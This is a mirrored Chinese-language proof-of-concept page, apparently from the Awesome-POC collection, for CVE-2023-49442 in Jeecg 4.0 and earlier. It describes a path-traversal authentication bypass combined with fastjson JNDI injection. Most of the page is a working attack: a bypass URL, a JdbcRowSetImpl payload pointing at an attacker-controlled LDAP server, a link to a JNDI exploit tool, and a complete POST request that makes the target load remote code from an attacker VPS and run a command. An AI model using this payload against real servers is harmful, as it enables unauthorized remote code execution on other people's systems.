mirror of
https://github.com/Threekiii/Awesome-POC.git
synced 2025-11-06 19:38:09 +00:00
65 lines
1.8 KiB
Markdown
65 lines
1.8 KiB
Markdown
# Jeecg jeecgFormDemoController JNDI 代码执行漏洞 CVE-2023-49442
|
||
|
||
## 漏洞描述
|
||
|
||
Jeecg 4.0及之前版本中,由于 /api 接口鉴权时未过滤路径遍历,攻击者可构造包含 `../` 的url绕过鉴权。攻击者可构造恶意请求利用 `jeecgFormDemoController.do?interfaceTest` 接口进行 jndi 注入攻击,实现远程代码执行。
|
||
|
||
Jeecg(J2EE Code Generation)是开源的代码生成平台,目前官方已停止维护。注:Jeecg 与 Jeecg-boot 非相同应用。
|
||
|
||
参考链接:
|
||
|
||
- https://xz.aliyun.com/t/13283
|
||
|
||
## 漏洞影响
|
||
|
||
```
|
||
Jeecg <= 4.0
|
||
```
|
||
|
||
## 漏洞复现
|
||
|
||
测试环境 fastjson 版本`1.2.31`,漏洞位置 `src/main/java/com/jeecg/demo/controller/JeecgFormDemoController.java`。
|
||
|
||
直接发包访问接口会 302 跳转,需要构造包含 `../` 的 url 绕过鉴权。`api` 接口不做限制,因此构造漏洞地址如下:
|
||
|
||
```
|
||
/api/../jeecgFormDemoController.do?interfaceTest=
|
||
```
|
||
|
||
JNDI 注入工具: https://github.com/WhiteHSBG/JNDIExploit
|
||
|
||
创建远程文件 poc.txt,其内容为 fastjson 代码执行的 payload:
|
||
|
||
```
|
||
{
|
||
"a": {
|
||
"@type": "java.lang.Class",
|
||
"val": "com.sun.rowset.JdbcRowSetImpl"
|
||
},
|
||
"b": {
|
||
"@type": "com.sun.rowset.JdbcRowSetImpl",
|
||
"dataSourceName": "ldap://<your-vps-ip>:1389/Basic/TomcatEcho",
|
||
"autoCommit": true
|
||
}
|
||
}
|
||
```
|
||
|
||
发送如下请求包:
|
||
|
||
```
|
||
POST /jeecg/api/../jeecgFormDemoController.do?interfaceTest= HTTP/1.1
|
||
Host: 127.0.0.1:8081
|
||
Pragma: no-cache
|
||
Cache-Control: no-cache
|
||
Upgrade-Insecure-Requests: 1
|
||
Accept-Encoding: gzip, deflate, br
|
||
Accept-Language: zh-CN,zh;q=0.9
|
||
Connection: close
|
||
Content-Type: application/x-www-form-urlencoded
|
||
cmd: whoami
|
||
|
||
serverUrl=http://<your-vps-ip>:8081/poc.txt&requestBody=123&requestMethod=GET
|
||
```
|
||
|
||
|